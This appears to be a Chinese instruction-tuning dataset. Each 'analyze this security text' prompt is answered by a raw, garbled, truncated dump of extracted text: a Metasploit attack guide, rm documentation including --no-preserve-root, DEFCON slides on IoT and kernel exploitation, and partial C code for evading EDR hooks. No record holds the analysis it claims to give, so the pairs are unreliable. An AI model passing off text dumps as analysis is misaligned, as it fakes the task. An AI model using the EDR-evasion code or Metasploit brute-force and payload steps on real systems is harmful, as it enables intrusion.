{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMSF渗透常用操作指南 一msf安装与更新 在服务器或者虚拟机执行(linux) curl https://raw.githubusercontent.com/rapid7/metasploitomnibus/master/config/template s/metasploit-frameworkwrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall 然后验证是否安装成功 输入msfconsole Windows安装 点击下载 https://windows.metasploit.com/metasploitframework-latest.msi 安装 解压安装包后直接点击安装 添加环境变量 使用 打开终端输入 msfconsole 直接使用 二更新msf 在目录内运行命令 ./msfupdate 运行命令 apt update , apt install metasploit-framework 如果./msfupdate不能执行 就把 /opt/metasploit-framework/bin/msfupdate 文件里面的 --allow- downgrades 参 数给去除掉就可以更新了 三msf七大模块介绍 msf有很多模块 一共有7个 命令ls /opt/metasploit-framework/embedded/framework/modules/ -al auxiliary 辅助模块该模块是用于辅助渗透的比如端口扫描存活探测暴力破解扫描发掘漏 洞探测信息等工作 encoders 编码器模块对payload进行编码加密可绕过部分杀软软件将攻击载荷进行编码类似与 加密让避免操作系统和杀毒软件辨认出来但是会让载荷的体积变大这个时候需要选择传输器和传 输体配对成的攻击载荷来下载目标载荷并且运行 evasion 躲避模块该模块分类下只有4个都是为了躲避微软的限制或者是杀软 的免杀效果很一 般 exploits 漏洞利用模块这个模块通常是用于对某些有可能存在漏洞的目标进行漏洞利用利用已发现 的漏洞对远程目标系统进行攻击植入并运行攻击载荷从而控制目标系统 nops 空指令模块为了避免攻击载荷在执行的过程中出现随机地址和返回地址错误而在执行shellcode 之前加入一些空指令使得在执行shellcode时有一个较大的安全着陆区 payloads 攻击载荷exploit成功之后就会执行payload这段payload可以是反弹 代码可以是添加用 户的代码在渗透攻击触发漏洞后劫持程序执行流程并跳入的这段代码本模块的作用是消除安全工作 人员开发这部分代码的代价 post 后渗透模块该模块一般用于内网渗透 四msf之auxiliary常用模块演示 先查看auxiliary的功能模块 Metasploit的辅助模块主要用于信息搜集阶段功能包括扫描口令猜解敏感信息嗅探FUZZ测试发 掘漏洞实施网络协议欺骗等 *auxiliary模块命名规则* 命名规则功能/服务/模块名称 例如 scanner/discovery/arp_sweep 一辅助模块(auxiliary)分为三个大类 1Admin Admin/HTTP模块 Admin/MSSQL模块 Admin/MySQL模块 Admin/Postgres模块 Admin/VMWare模块 2Scanner DCERPC Discovery FTP HTTP IMAP MSSQL MySQL NetBIOS POP3 SMB SMTP SNMP SSH Telnet TFTP VMWare VNC 3Server 捕获模块 二Admin例子 1查找关于mysql的辅助模块 2选择auxiliary/admin/mysql/mysql_sql use 1 3查看需要设置的参数 4设置目标主机用户名和密码 5run执行 其他的就不演示了 三scanner例子 常用扫描模块及功能 auxiliary/scanner/portscan 端口扫描 auxiliary/scanner/smb/smb_version SMB系统版本扫描 auxiliary/scanner/smb/smb_enumusers SMB枚举 auxiliary/scanner/smb/smb_login SMB弱口令扫描 auxiliary/admin/smb/psexec_command SMB登录且执行命令 auxiliary/scanner/ssh/ssh_login ssh登录测试 scanner/ mssq/mssql_ping MSSQL主机信息扫描 admin/mssql/mssql_enum MSSQL枚举 admin/ms", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nrm === 用于删除给定的文件和目录 ## 补充说明 **rm** **命令** 可以删除一个目录中的一个或多个文件或目录也可以将某个目录及其下属的所有文件及其子目录均删除掉对于链接文件只是删除整个链接文件而原有文件保持不变 注意使用rm命令要格外小心因为一旦删除了一个文件就无法再恢复它所以在删除文件之前最好再看一下文件的内容确定是否真要删除rm命令可以用-i选项这个选项在使用文件扩展名字符删除多个文件时特别有用使用这个选项系统会要求你逐一确定是否要删除这时必须输入y并按Enter键才能删除文件如果仅按Enter键或其他字符文件不会被删除 ### 语法 ```shell rm (选项)(参数) ``` ### 选项 ```shell -d直接把欲删除的目录的硬连接数据删除成0删除该目录 -f强制删除文件或目录 -i删除已有文件或目录之前先询问用户 -r或-R递归处理将指定目录下的所有文件与子目录一并处理 --preserve-root不对根目录进行递归操作 -v显示指令的详细执行过程 ``` ### 参数 文件指定被删除的文件列表如果参数中含有目录则必须加上`-r`或者`-R`选项 ### 实例 交互式删除当前目录下的文件test和example ```shell rm -i test example Remove test ?n不删除文件test) Remove example ?y删除文件example) ``` 删除当前目录下除隐含文件外的所有文件和子目录 ```shell # rm -r * ``` 应注意这样做是非常危险的! **删除当前目录下的 package-lock.json 文件** ```shell find . -name \"package-lock.json\" -exec rm -rf {} \\; ``` **查找 *.html 结尾的文件并删除** ```shell find ./docs -name \"*.html\" -exec rm -rf {} \\; ``` **删除当前项目下 *.html 结尾的文件** ```shell rm -rf *.html ``` **删除当前目录下的 node_modules 目录** ```shell find . -name 'node_modules' -type d -prune -exec rm -rf '{}' + ``` **删除文件** ```shell # rm 文件1 文件2 ... rm testfile.txt ``` **删除目录** > rm -r [目录名称] > -r 表示递归地删除目录下的所有文件和目录 > -f 表示强制删除 ```shell rm -rf testdir rm -r testdir ``` **删除操作前有确认提示** > rm -i [文件/目录] ```shell rm -r -i testdir ``` **批量删除 `icons` 文件夹中的子文件夹中的 data 文件夹** ```shell rm -rf icons/**/data ``` **rm 忽略不存在的文件或目录** > -f 选项LCTT 译注即 force让此次操作强制执行忽略错误提示 ```shell rm -f [文件...] ``` **仅在某些场景下确认删除** > 选项 -I可保证在删除超过 3 个文件时或递归删除时LCTT 译注 如删除目录仅提示一次确认 ```shell rm -I file1 file2 file3 ``` **删除根目录** > 当然删除根目录/是 Linux 用户最不想要的操作这也就是为什么默认 rm 命令不支持在根目录上执行递归删除操作 > 然而如果你非得完成这个操作你需要使用 --no-preserve-root 选项当提供此选项rm 就不会特殊处理根目录/了 ```shell 不给实例了操作系统都被你删除了你太坏了 ``` **rm 显示当前删除操作的详情** ```shell rm -v [文件/目录] ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2012 Presented by: Home Invasion v2.0 Attacking Network-Controlled Embedded Devices Daniel unicornFurn  2012  2012  Who are we?  2012 The Presenters  Daniel unicornFurnace Crowley  Managing Consultant, Trustwave (SpiderLabs team)  Jennifer savagejen Savage  Software Engineer, Tabbedout  David videoman Bryan  Security Consultant, Trustwave (SpiderLabs team)  2012  2012  What are we doing here?  2012 The Smart Home Science fiction becomes science fact Race to release novel products means poor security Attempt to hack a sampling of smart devices Many products we didnt cover Android powered oven Smart TVs IP security cameras  2012  2012  Whats out there?  2012 Belkin WeMo Switch  2012 Belkin WeMo Switch 1. Vulnerable libupnp version 2. Unauthenticated UPnP actions 1. SetBinaryState 2. SetFriendlyName 3. UpdateFirmware  2012 MiOS VeraLite  2012 MiOS VeraLite 1. Lack of authentication on web console by default 2. Lack of authentication on UPnP daemon 3. Path Traversal 4. Insufficient Authorization Checks 1. Firmware Update 2. Settings backup 3. Test Lua code 5. Server Side Request Forgery 6. Cross-Site Request Forgery 7. Unconfirmed Authentication Bypass Vulnerable libupnp Version  2012 INSTEON Hub  2012 INSTEON Hub 1. Lack of authentication on web console 1. Web console exposed to the Internet  2012 Karotz Smart Rabbit  2012 Karotz Smart Rabbit 1. Exposure of wifi network credentials unencrypted 2. Python module hijack in wifi setup 3. Unencrypted remote API calls 4. Unencrypted setup package download  2012 Linksys Media Adapter 1. Unauthenticated UPnP actions  2012 LIXIL Satis Smart Toilet  2012 Radio Thermostat 1. Unauthenticated API 2. Disclosure of WiFi passphrase  2012 SONOS Bridge  2012 SONOS Bridge 1. Support console information disclosure  2012  2012  DEMONSTRATION  2012  2012  CONCLUSION  2012 Questions? Daniel unicornFurnace Crowley dcrowley@trustwave.com @dan_crowley Jennifer savagejen Savage savagejen@gmail.com (PGP key ID 6326A948) @savagejen David videoman ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 15 August 3, 2007 Robert W. Clark United States v. Prochner, 417 F.3d 54 (D. Mass. July 22, 2005) Definition of Special Skills Special skill - a skill not possessed by members of the general public and usually requiring substantial education, training or licensing. Examples - pilots, lawyers, doctors, accountants, chemists, and demolition experts Not necessarily have formal education or training Acquired through experience or self-tutelage Critical question is - whether the skill set elevates to a level of knowledge and proficiency that eclipses that possessed by the general public. Court Recognizes Your Special Skills Since You Are Special Clarks Law  Explain @ 3rd Grade Level Explaining Technology to Lawyers FACTS ARE KING!!! Explaining Computer Search/Technology E-Discovery Rules Final Point- Materials Provided Contain Greater Details than Presentation slides. Court Recognizes Your Special Skills Agenda Active Response Liability for Stolen Code?? Jurisdiction Civil Jurisdiction Criminal Web Sites  Liabilities & Jurisdiction Search & Seizure of Computers Home Work Place Consent & Third Party Consent Viacom v. Google E-Discovery & Forensics Our Discussion  Like law school, just to get you thinking and debating. Not necessarily an endorsement by the presenter, aka- me. Disclaimer aka The Fine Print JER 3-307. Teaching, Speaking and Writing a. Disclaimer for Speeches and Writings Devoted to Agency Matters. A DoD employee who uses or permits the use of his military grade or who includes or permits the inclusion of his title or position as one of several biographical details given to identify himself in connection with teaching, speaking or writing, in accordance with 5 C.F.R. 2635.807(b)(1) (reference (h)) in subsection 2-100 of this Regulation, shall make a disclaimer if the subject of the teaching, speaking or writing deals in significant part with any ongoing or announced policy, program or operation of the DoD employee's Agency, as defined in subsection 2-2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCREATING THE DEFCON CHINA 1.0 BADGE joe Grand aka kingpin introduction / badge history  bring community together through interactivity  create game to encompass the defcon experience  simple design that could be expanded during/after defcon  interactive, command-based menu for additional exploration goals  complete tasks, get rewarded  4 roots and 4 branches, each with 4 leds  when task is complete, badge inserted into programmer to unlock LED  when each root is complete, magic happens  when all roots are complete, more magic happens gameplay early concepts Prototyping block diagram DEFCON China 1.0 Badge Block Diagram Document v1.0 May 17, 2019 Joe Grand, Grand Idea Studio, Inc. I2C MCU ATmega328P Arduino Mini 3.3V, 8MHz Accelerometer LIS3DH USB Host PC USB Micro-B LED x32 Serial-to-USB FT231X 3 FPC Edge Connector 12 4 + 4 LED Driver 74HC595 LDO MCP1700 Power Switch USB 5V 3.0V Coin Cell 3V DEFCON China 1.0 Badge Block Diagram Document v1.0 May 17, 2019 Joe Grand, Grand Idea Studio, Inc. I2C MCU ATmega328P Arduino Mini 3.3V, 8MHz Accelerometer LIS3DH USB Host PC USB Micro-B LED x32 Serial-to-USB FT231X 3 FPC Edge Connector 12 4 + 4 LED Driver 74HC595 LDO MCP1700 Power Switch USB 5V 3.0V Coin Cell 3V Hardware USB POWER LED control ACCELEROMETER mcu FPC  First for conference badge  new material (for us) opens up new risks/challenges  specific stack-up to meet edge connector requirements  MAJOR SUPPORT by electronic interconnect, adapt electronics FLEXIBLE PRINTED CIRCUIT (FPC)  edge connector as interface to the outside world  UART, I2C, AVR ICSP  used with programming shield to set/read state of badge leds FLEXIBLE PRINTED CIRCUIT (FPC) pin 1 pin 12 1. GND 2. SCK 3. MISO 4. MOSI 5. /RST 6. SDA 7. SCL 8. SIN 9. SOUT 10. /SENSE 11. GPIO 12. VCC FLEXIBLE PRINTED CIRCUIT (FPC) IT BENDS!  test  test  test Schematic Programmed w/ FT_PROG To Host 1 2 3 4 5 P2 TE 2173157-2 0.1uF C9 USB Micro B 0.01uF C3 220R@100MHz L1 5V0_USB RTS 2 DCD 8 RI 5 VCC 15 TXD 20 CTS 9 CBUS0 18 3V", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLiving in the RIA World Introduction Who are we? Whats a RIA? Why use RIA? Frameworks Adobe AIR MS Silverlight Google Gears Mozilla Prism HTML 5 Attack Scenarios RIA vs OS RIA vs the web Living in the RIA World: Blurring the Line between Web and Desktop Security Alex Stamos David Thiel Justine Osborne Defcon 16 Living in the RIA World Introduction Who are we? Whats a RIA? Why use RIA? Frameworks Adobe AIR MS Silverlight Google Gears Mozilla Prism HTML 5 Attack Scenarios RIA vs OS RIA vs the web 1 Introduction Who are we? Whats a RIA? Why use RIA? 2 RIA Frameworks Adobe AIR MS Silverlight Google Gears Mozilla Prism HTML 5 3 Attack Scenarios Living in the RIA World Introduction Who are we? Whats a RIA? Why use RIA? Frameworks Adobe AIR MS Silverlight Google Gears Mozilla Prism HTML 5 Attack Scenarios RIA vs OS RIA vs the web Who are we? Researchers and consultants with iSEC Partners We work with many companies involved in these technologies or with creating rich sites We are already starting to see RIA applications in the wild Living in the RIA World Introduction Who are we? Whats a RIA? Why use RIA? Frameworks Adobe AIR MS Silverlight Google Gears Mozilla Prism HTML 5 Attack Scenarios RIA vs OS RIA vs the web Whats a RIA? Rich Internet Applications As with Web 2.0, ill-defined May contain some of the following ingredients: AJAXy Flashiness Local storage Offline mode Decoupling from the browser Access to lower level OS resources: sockets, hardware devices Appearance of a traditional desktop application Our research has shown a huge disparity in features and security design Living in the RIA World Introduction Who are we? Whats a RIA? Why use RIA? Frameworks Adobe AIR MS Silverlight Google Gears Mozilla Prism HTML 5 Attack Scenarios RIA vs OS RIA vs the web Whats a RIA? Party like its 1997 Constantly updating content! Push technology! No more browsers! Living in the RIA World Introduction Who are we? Whats a RIA? Why use RIA? Frameworks Adobe AIR MS Silverlight Google Gea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<!-- ~ Licensed to the Apache Software Foundation (ASF) under one ~ or more contributor license agreements. See the NOTICE file ~ distributed with this work for additional information ~ regarding copyright ownership. The ASF licenses this file ~ to you under the Apache License, Version 2.0 (the ~ \"License\"); you may not use this file except in compliance ~ with the License. You may obtain a copy of the License at ~ ~ http://www.apache.org/licenses/LICENSE-2.0 ~ ~ Unless required by applicable law or agreed to in writing, ~ software distributed under the License is distributed on an ~ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY ~ KIND, either express or implied. See the License for the ~ specific language governing permissions and limitations ~ under the License. --> <!DOCTYPE HTML> <html xmlns:th=\"http://www.thymeleaf.org\"> <head> <title>Account Info</title> <!--/*/ <th:block th:include=\"fragments/head :: head\"/> /*/--> </head> <body> <div class=\"container\"> <h1 th:text=\"'Account Info Page for: ' + ${name} + '!'\"/> <a th:href=\"@{/}\" class=\"btn btn-primary\">Home</a> <form id=\"logoutForm\" th:action=\"@{/logout}\" method=\"post\"> <input type=\"submit\" class=\"btn btn-danger\" value=\"Logout\"/> </form> </div> <script src=\"//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js\"></script> <script src=\"https://netdna.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js\"></script> </body> </html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 基本介绍 ## 格定义 格是 m 维欧式空间 $Rm$ 的 n ($m\\geq n$) 个线性无关向量$b_i(1\\leq i \\leq n)$ 的所有整系数的线性组合即 $L(B)=\\{\\sum\\limits_{i=1}{n}x_ib_i:x_i \\in Z,1\\leq i \\leq n\\}$ 这里 B 就是 n 个向量的集合我们称 - 这 n 个向量是格 L 的一组基 - 格 L 的秩为 n - 格 L 的位数为 m 如果 m=n那么我们称这个格式满秩的 当然也可以是其它群不是 $Rm$ ## 格中若干基本定义 ### successive minima 格是 m 维欧式空间 $Rm$ 的秩为 n 的格那么 L 的连续最小长度(successive minima)为 $\\lambda_1,...,\\lambda_n \\in R$满足对于任意的 $1\\leq i\\leq n$$\\lambda_i$ 是满足格中 i 个线性无关的向量$v_i$ $||v_j||\\leq \\lambda_i,1\\leq j\\leq i$ 的最小值 自然的 $\\lambda_i \\leq \\lambda_j ,\\forall i <j$ ## 格中计算困难性问题 **最短向量问题(Shortest Vector ProblemSVP)**给定格 L 及其基向量 B 找到格 L 中的非零向量 v 使得对于格中的任意其它非零向量 u$||v|| \\leq ||u||$ **$\\gamma$-近似最短向量问题(SVP-$\\gamma$)**给定格 L找到格 L 中的非零向量 v 使得对于格中的任意其它非零向量 u$||v|| \\leq \\gamma||u||$ **连续最小长度问题(Successive Minima Problem, SMP)**:给定秩为 n 的格 L找到格 L 中 n 个线性无关向量 $s_i$满足 $\\lambda_i(L)=||s_i||, 1\\leq i \\leq n$ **最短线性无关向量问题(Shortest Independent Vector Problem, SIVP)**给定一个秩为 n 的格 L找到格 L 中 n 个线性无关向量 $s_i$满足$||s_i|| \\leq \\lambda_n(L), 1\\leq i \\leq n$ **唯一最短向量问题(Unique Shortest Vector Problem, uSVP-$\\gamma$)**给定格 L满足 $ \\lambda_2(L) > \\gamma \\lambda_1(L)$找到该格的最短向量 **最近向量问题(Closest Vector ProblemCVP)**给定格 L和目标向量 $t\\in Rm$找到一个格中的非零向量 v使得对于格中的任意非零向量 u满足 $||v-t|| \\leq ||u-t||$", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Design of a blocking-resistant anonymity system Roger Dingledine, Nick Mathewson The Tor Project 2 Outline  Crash course on Tor  Goals for blocking resistance  Assumptions (threat model)  What Tor offers now  Current proxy solutions  What we need to add to Tor  All the other issues that come up 3 Tor: Big Picture  Freely available (Open Source), unencumbered.  Comes with a spec and full documentation: Dresden and Aachen implemented compatible Java Tor clients; researchers use it to study anonymity.  Chosen as anonymity layer for EU PRIME project.  200000+ (?) active users.  PC World magazine named Tor one of the Top 100 Products of 2005. 4 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's privacy! 5 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's network security! It's privacy! 6 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's traffic-analysis resistance! It's network security! It's privacy! 7 The simplest designs use a single relay to hide connections. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X (example: some commercial proxy providers) 8 But a single relay is a single point of failure. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Evil Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X Eavesdropping on the relay works too. 9 So, add multiple relays so that no single one can betray Alice. Bob Alice R1 R2 R3 R4 R5 10 A corrupt first hop can tell that Alice is talking, but not to whom. Bob Alice R1 R2 R3 R4 R5 11 A corrupt final hop can tell that somebody is talking to Bob, but not who. Bob Alice R1 R2 R3 R4 R5 12 Alice makes a session key with R1 ...And then tunnels to R2...and to R3 Bob Alice R1 R2 R3 R4 R5 Bob2 13 Attackers can block users from connecting to the Tor network  By blocking the directory authorities  By blocking all the se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKERNEL WARS: KERNEL-EXPLOITATION DEMYSTIFIED Introduction to kernel-mode vulnerabilities and exploitation  Why exploit kernel level vulnerabilities?  It's fun!  Relatively few are doing it  Bypasses defense mechanisms and restrictions Introduction to kernel-mode vulnerabilities and exploitation  Why exploit kernel level vulnerabilities?  Attacks at the lowest level  Does not rely on any particular application being installed  Does not rely on how applications are configured  Does not rely on file / registry permissions Introduction to kernel-mode vulnerabilities and exploitation  Reasons not to exploit kernel level vulnerabilities  Usually one-shot, exploit needs to be very reliable  Kernel debugging can be tedious setting up  Need some knowledge about kernel internals Introduction to kernel-mode vulnerabilities and exploitation  Common targets for attack in a kernel  Systemcalls  I/O and IOCTL-messages through devicefiles  Handling of files in pseudofilesystems (like procfs)  Handling of data from the network (wireless/wired)  Interaction with hardware (USB, Firewire, etc)  Executable file format loaders (ELF, PE, etc) Introduction to kernel-mode vulnerabilities and exploitation  Payload strategy  Elevating privileges  Altering the UID-field (Unix)  Stealing access tokens (Windows)  Injecting backdoors  Stealth! Do everything in kernel-mode Introduction to kernel-mode vulnerabilities and exploitation  Payload strategy  Breaking chroot / jail / other restrictions  Everything can be bypassed in kernel-mode  Ring 0: One ring to rule them all.. Introduction to kernel-mode vulnerabilities and exploitation  Payload techniques  Determining addresses and offsets  Resolving symbols  Pattern matching  Hardcoding (last resort) Introduction to kernel-mode vulnerabilities and exploitation  Payload techniques  OS/architecture-specific techniques  Windows/x86: ETHREAD-pointer at 0xFFDFF124 (fs:0x124)  FreeBSD/x86: proc-pointer at [fs:0]  Linux/x86: task_struct-pointer at esp & 0x", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n第一章 概论 ..................................................................................................................1 1.1 网络的历史.......................................................................................................1 1.2 OSI 模型...........................................................................................................3 1.3 Internet 体系模型..............................................................................................4 1.4 客户/服务器模型...............................................................................................5 1.4 UNIX 的历史 ...................................................................................................7 1.4.1 Unix 诞生前的故事 .................................................................................7 1.4.2 UNIX 的诞生..........................................................................................8 1.4.3 1979  UNIX 第七版 ............................................................................. 10 1.4.4 UNIX 仅仅是历史吗?............................................................................. 11 1.5 Linux 的发展.................................................................................................. 11 1.5.1 Linux 的发展历史.................................................................................. 12 1.5.2 什么叫 GNU ...................................................................................... 12 1.5.3 Linux 的特色 ........................................................................................ 13 1.5.4 硬件需求............................................................................................... 14 1.5.5 Linux 可用的软件 ................................................................................. 14 1.5.6 为什么选择 Linux ............................................................................ 15 1.6 Linux 和 Unix 的发展.................................................................................... 15 第二章 UNIX/Linux 模型...................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWibbly Wobbly, Timey Wimey What's Really Inside Apple's U1 Chip Jiska Classen Secure Mobile Networking Lab - SEEMOO Technical University of Darmstadt, Germany Alexander Heinrich Secure Mobile Networking Lab - SEEMOO Technical University of Darmstadt, Germany Ultra Wideband (UWB) U1 Chip Nobody knows what it is or does Only available in the latest generation of devices Must be hacker-proof! Non-interceptable with cheap SDRs UWB Secure Ranging & NLOS Distance Measurement Line of sight distance <3 meters, open door. Strongest path is non line of sight #?$%! UWB Secure Ranging & NLOS Distance Measurement For more details, see WiSec 2021 paper Security Analysis of IEEE 802.15.4z/HRP UWB Time-of-Flight Distance Measurement by Singh et. al. Somewhat UWB Features 20 90º 20 90º Nearby Interaction Find My UWB to X UWB to X UWB Internals UWB System Architecture AirDrop UWB Beaconing + AirDrop Protocol AirDrop Bluetooth Discovery Length AirDrop Zero padding Version Hash #1 Hash #2 Hash #3 Hash #4 Random non-resolvable MAC address Stute et al. (2019). A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link. Celosia et al. (2020). Discontinued Privacy: Personal Data Leaks in Apple Bluetooth-Low-Energy Continuity Protocol 05 12 00000000 00000000 01 ac5b d44e a87b dafe 00 UWB Bluetooth Discovery 0f 05 a0 35 eed4de Length Authentication tag Action Type: Point To Share Action Flags Nearby Action Random resolvable MAC address Martin et al. (2019). Handoff All Your Privacy  A Review of Apples Bluetooth Low Energy Continuity Protocol Celosia et al. (2020). Discontinued Privacy: Personal Data Leaks in Apple Bluetooth-Low-Energy Continuity Protocol UWB Bluetooth Discovery 0f 05 a0 35 eed4de sharingd  Nearby device detected  UWB Point To Share MAC address Authentication Tag Validation 0f 05 a0 35 eed4de sharingd  Nearby device detected  UWB Point To Share  Validate Auth Tag MAC address SipHash( , IRK) = Auth Tag MAC", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGood Viruses. Evaluating the Risks. Dr. Igor Muttik | Senior Architect | McAfee | Avert Labs 2 Good viruses  It is just technology  neither bad nor good  What could make it dangerous:  Lack of control  Wide availability  If it is dangerous  its bad  Atomic bomb is bad  Splitting the atom?  Chain reaction? (worst because control is lost)  Can a virus be written accidentally?  Can a good virus get out of control? 3 Agenda  Good virus idea keeps coming up  Already.71  a tool and a virus (disassembly and operation)  Corrupted blood epidemic in WoW (video)  W32/Nachi  worm that exploited and patched a vulnerability  Pros and cons of harnessing replicating code  Conclusions 4 Google search for good virus and bad virus  People are very receptive to a good virus idea  A lot of bad virus searches are emotional (horrible and awful) 5 ALREADY.COM  a tool and a worm! 6 ALREADY.COM tool usage @echo off rem Start of AUTOEXEC.BAT file rem Opening commands always execute ALREADY.COM IF ERRORLEVEL 1 GOTO skip rem Things to do once a day go here :skip rem Following commands always execute 7 Already.71  just 71 (0x47) bytes 8 Already.71  get current date (1st block of 3) 9 Already.71  compare (2nd block of 3) 10 Already.71  write itself to disk (3rd block) 11 How does Already.71 spread? Due to current folder concept. 12 A tool 13 Empty folder 14 Execution 15 Replicant! 16 What did we learn?  Probability of a mistake grows when insecure programming techniques are used:  Self-modifying code  Modifying other programs on disk or in memory  Using exploits  Insecure environments are unexpectedly common 17 Corrupted blood incident in WoW 18 Corrupted blood epidemic (Sep 2005)  ZulGurub instance dungeon (added in WoW 1.7 for 60+ lvl players): 19 Hakkar the Soulflayer monster  Casts a powerful Corrupted blood spell  Infectious!  Epidemic started 20 What went wrong?  Timeline  WoW 1.7 went out on 13 Sep 2005  Epidemics started on several servers on 15 Sep 2005  Source - Hakkar monster from ZulG", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLABS Back to the Future Our journey back to the future of Windows vulnerabilities and the 0-days we brought back with us  15+ years in Cyber Security  Director of Security Research @ SafeBreach  Main focus in APT and vulnerability research 2 Tomer Bar Director of Security Research LABS  7+ years in Cyber Security  Security Researcher @ SafeBreach  Main focus in vulnerability research 3 Eran Segal Security Researcher LABS 4 In memory of my dad David 1951-2021 5 Research State of Mind Learn from the past if you want to predict the future Confucius 6 Agenda  Research background  Solution process and Infrastructure  The 4-step process from 0 to 0-day  E2E example  Discovered and reported on six vulnerabilities  Two post-exploitation  Deferred Patching  Closure and Q&A 7 Research Goals  Rapid analysis of security patches in Windows  Root cause analysis  Prioritization of vulnerabilities 1 1 days Automatic exploitation pocs 2 0 days Semi-automatic approach 3 8 Research Assumptions Microsoft will fix (patch) the same vulnerability classes with similar patches techniques/logic 1 The code after the patch might be still vulnerable 2 3 A patched function is a good candidate for other vulnerabilities 9 A Story Of One Function: ETWpNotifyGuid - 5 vulnerabilities 10 A Story Of One Function: ETWpNotifyGuid - 5 vulnerabilities Ntoskrnl function - WIN10 CVE-2020-1033 LPE Invalid check of the input CVE-2021-1682 LPE Heap Overflow due to assign in to offset 0x50 In any allocated buffer CVE-2020-1034 Information Disclosure Invalid check on boolean variable (checks relevant for bit mask) CVE-2021-1662 LPE Wrong bound check leads to OOB write to kernel pool 11 Research Approach  Past approach  Manual patch diff of a Single Vulnerability  The goal is limited to understanding the root cause usually for constructing a 1-day POC  Our approach - an automated process that would gather all the insights from all the patches in a single, searchable db for 0-day hunting We adopted a new approach, in ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows pass edrhook 1. - 2. NtSuspendProcess 3. NtQuerySystemInform 4. ObjectTypeIndex ObjectTypeIndex 5. NtQueryInformation 6. DUPLICATE_CLOSE_SOURCE 7. 1 8. NtResumeProcess // if (NtSuspendProcess(hProcess) != 0) { CloseHandle(hProcess); return 1; } // NtSuspendProcess NtSuspendProcess = (unsigned long (__stdcall *)(void *)) GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtSuspendProcess\"); if (NtSuspendProcess == NULL) { return 1; } 1 2 3 4 5 6 7 8 9 10 11 #include <stdio.h> #include <windows.h> #define SystemExtendedHandleInformation 64 #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 1 2 3 4 5 #define FileNameInformation 9 #define PROCESS_SUSPEND_RESUME 0x800 struct SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { ULONG Object; ULONG UniqueProcessId; ULONG HandleValue; ULONG GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; }; struct SYSTEM_HANDLE_INFORMATION_EX { ULONG NumberOfHandles; ULONG Reserved; SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX HandleList[1]; }; struct FILE_NAME_INFORMATION { ULONG FileNameLength; WCHAR FileName[1]; }; struct IO_STATUS_BLOCK { union { DWORD Status; PVOID Pointer; }; DWORD *Information; }; struct GetFileHandlePathThreadParamStruct { HANDLE hFile; char szPath[512]; }; DWORD (WINAPI *NtQuerySystemInformation)(DWORD SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); DWORD (WINAPI *NtQueryInformationFile)(HANDLE FileHandle, void *IoStatusBlock, PVOID FileInformation, ULONG Length, DWORD FileInformationClass); DWORD (WINAPI *NtSuspendProcess)(HANDLE Process); 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 DWORD (WINAPI *NtResumeProcess)(HANDLE Process); SYSTEM_HANDLE_INFORMATION_EX *pGlobal_SystemHandleInfo = NULL; DWORD dwGlobal_DebugObjectType = 0; DWORD GetSystemHandleList() { DWORD dwAllocSize = 0; DWORD dwStatus = 0; DWORD dwLength = 0; BYTE *pSystemHandle", "category": "text_analysis", "source": "security_papers"}
